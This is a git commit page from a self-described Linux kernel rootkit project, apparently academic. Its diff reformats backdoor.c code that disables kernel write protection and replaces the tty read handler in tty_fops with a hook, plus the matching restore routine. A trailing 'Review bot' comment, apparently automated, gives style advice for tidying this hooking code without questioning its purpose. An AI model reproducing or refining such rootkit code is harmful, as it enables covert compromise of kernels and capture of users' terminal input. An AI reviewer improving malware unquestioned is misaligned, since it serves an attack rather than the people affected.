linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit f9b694a09a07a9ecc3c55a996086ed02df678eb6
parent 197578a53c0e3c75fb19346fa2e39c1884ed5935
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 30 Nov 2020 12:33:52 +0100

refactors code

Diffstat:
Msrc/backdoor.c | 9++++++---
1 file changed, 6 insertions(+), 3 deletions(-)

diff --git a/src/backdoor.c b/src/backdoor.c
@@ -23,10 +23,12 @@ void backdoor_tty(void)
 {
     if (!current_tty_read) {
-        current_tty_read = ((struct file_operations *)kallsyms_lookup_name("tty_fops"))->read;
+        current_tty_read
+            = ((struct file_operations *)kallsyms_lookup_name("tty_fops"))->read;
         disable_protection();
-        ((struct file_operations *)kallsyms_lookup_name("tty_fops"))->read = (void *)g7_tty_read;
+        ((struct file_operations *)kallsyms_lookup_name("tty_fops"))->read
+            = (void *)g7_tty_read;
         enable_protection();
     }
 }
@@ -38,7 +40,8 @@ unbackdoor(void)
     if (current_tty_read) {
         disable_protection();
-        ((struct file_operations *)kallsyms_lookup_name("tty_fops"))->read = (void *)current_tty_read;
+        ((struct file_operations *)kallsyms_lookup_name("tty_fops"))->read
+            = (void *)current_tty_read;
         enable_protection();
         while ((cur = atomic_read(&tty_read_count)) > 0) {
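Review bot: The reflow in backdoor_tty only breaks each long statement in front of the `=`, which is not how kernel-style C wraps a long line (the operator stays at the end of the first line and the continuation is indented), and it leaves the same `kallsyms_lookup_name("tty_fops")` lookup repeated and re-cast in both statements. Hoisting the cast into one local at the top of the branch, `struct file_operations *tty_fops = (struct file_operations *)kallsyms_lookup_name("tty_fops");`, lets both assignments fit on one line as `current_tty_read = tty_fops->read;` and `tty_fops->read = (void *)g7_tty_read;` with no continuation at all. The second hunk in unbackdoor() reflows the restoring assignment the same way and would take the same local; that hunk's end lies outside this chunk. Neither function documents what it is changing; a comment such as `/* swaps the read handler in the shared tty file_operations table; the write happens with write protection lowered */` above the first assignment would make the effect on the rest of the kernel clear to a reader, and this kind of change to a file_operations pointer is exactly what a kernel function-pointer integrity check compares against.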